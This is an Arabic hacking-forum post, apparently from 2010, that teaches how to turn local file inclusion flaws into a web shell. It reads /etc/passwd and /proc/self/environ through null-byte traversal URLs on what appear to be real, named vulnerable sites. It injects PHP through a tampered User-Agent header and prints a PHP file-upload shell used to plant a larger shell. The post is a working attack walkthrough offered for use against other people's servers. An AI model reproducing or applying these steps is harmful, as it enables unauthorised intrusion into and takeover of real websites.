عرض مشاركة واحدة
قديم 06-29-2010, 01:54 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي الحصول على شل عن طريق ثغرات local file include المنتشره بكثره


السلام عليكم ورحمة الله وبركاته

موضوعنا اليوم عن الحصول على شل عن طريق ثغرات local file include

طبعا الثغره فعاله ومنتشره فى كتير جدا من السيرفرات

ولو دخلت على اى موقع ثغرات تلقاها اكتر من السكيول

لكن مفيش اهتمام بيها مش عارف ليه مع العلم ان استغلالاتها كتير

وانا كنت فاكر ان الطريقه معروفه لانها قديمه حبتين لكن اكتشفت ان كتير مش عارفينها

عموما نبدأ الشرح وهو سهل جدا لكن محتاج تركيز مش أكتر

الأدوات الأول

1 - متصفح فير فوكس (أكيد عند كله)

2 - إضافة mozilla sniffer

https://addons.mozilla.org/en-US/firefox/addon/176005/

3 - فتح دماغك معايا شويه بس

نبدأ الشرح

ده مثال لموقع مصاب بثغرة lfi

http://www.iowaarboretum.org/index.p.../etc/passwd%00

وده موقع للتطبيق فى حالتنا

http://falalalalights.net/site/index...elf/environ%00

على سبيل المثال لا الحصر

نشوف هنعمل ايه

أول حاجه اعرف ان لما بتطلب ملف بى اتش بى من السيرفر فيه عمليه جديده بتبدأ وبتتحفظ فى ملف /proc خاص بيها (مش مهم)

المهم دلوقت ان السيرفرات بيبقى فيها مجلد بالعنوان ده /proc/self/environ بيحتوى على معلومات عن العمليات الأخيره اللى حصلت

احنا بقى هنعمل ايه

هنحقن المجلد ده بشل بسيط الاوا
وعن طريق الشل البسيط نرفع شل كبير

نشوف ازاى

ده المسار اللى بنجيب منه اليوزرات

http://www.site.com/index.php?option.../etc/passwd%00

وخلى بالك من علامة %00 اللى فى الاخر دى

مهمه جدا

طيب بعد منطلب الملف ده النتيجه هتبقى كده

[

تمام لحد كده الموقع مصاب وزى الفل

نشوف بقى /proc/self/environ متفعله او لا لانها مش موجوده فى كل السيرفرات

ازاى بقى يا حلو
هنغير /etc/passwd ب /proc/self/environ
http://www.site.com/index.php?option...elf/environ%00

لو كان الناتج زى كده



يبقى متفعله وزى الفل

طبعا هتلاقى كلام كتير لكن ده فى اول الصفحه وزى منت شايف محتوى على user_agent وده اهم حاجه دلوقت

طيب لو مظهرش كده وظهر فور بيدن او صفحه بيضه

يبقة كده مش متفعل وشوف سايت تانى بقى او استنى للدرس الجى هتشوف فيه مفاجأه

اوك

لقيناه متفعل هنعمل ايه

نحقن الشل تبعنا فيه وهتشوف ازاى لكن الاول حاول تنقى شل خفيف وانا هستخدم ده
مجرد فورم ابلو مش اكتر نرفع بيه الشل الكبير بتاعنا

كود:
<?php
echo '<b><br><br>'.php_u****().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" ****="uploader" id="uploader">';
echo '<input type="file" ****="file" size="50"><input ****="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_****'], $_FILES['file']['****'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>
تم ارفاق الشل

نشوف بقى هنحقنه ازاى

بعد متسطب الاداه mozilla sniffer

تفتحها من الفاير فوكس عن طريق tools > mozilla sniffer

وبعدين تضغط start sniff

طبعا ناس هتقول اداة التامبر بتقضى نفس الغرض

اقولك لو جربت تغبر الاجينت بالتامبر هيديك ايرور ومش هتشتغل لكن السنيفر شغاله بدون مشاكل lol
طيب

ضغطنا start sniff
افتح بقى السايت تانى طبعا السايت ده

http://www.site.com/index.php?option...elf/environ%00

واختار tamper

تلقى جاك حاجه زى دى


لاحظ المحدد بازرق اللى هو user agent

حط مكانه كود الشل الموجود فوق

واتكى ok

تمام كده تلاقى الصفحه ظهر فيها فورم رفع
زى ده


لول

ارفع الشل تبعك بس وانت مشغل السنيفر برضه متقفلهاش

بعد متضغط ابلود
اضغط tamper تانى وحط نفس الكود اللى حطيته قبل كده اللى هو تبع الرفع


واضغط اوك

تمام كده انا رفعت الشل باسم faris.php

تروح بقى على السايت مباشر وتضيف يعدها اسم الشل

توضيح
انا كنت شغال هنا
http://www.site.com/index.php?option...elf/environ%00

يبقى الشل هنا

http://www.site.com/faris.php

والنتيجه



مبروووك

lol


انتهى الشرح
اتمنى يكون واضح
وأى استفسارات انا جاهز

HaCKeR-MaN k:

نسخ لصق
-------
ahmed_100022
عالم المعرفه


hgpw,g ugn ag uk 'vdr eyvhj local file include hglkjavi f;evi

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس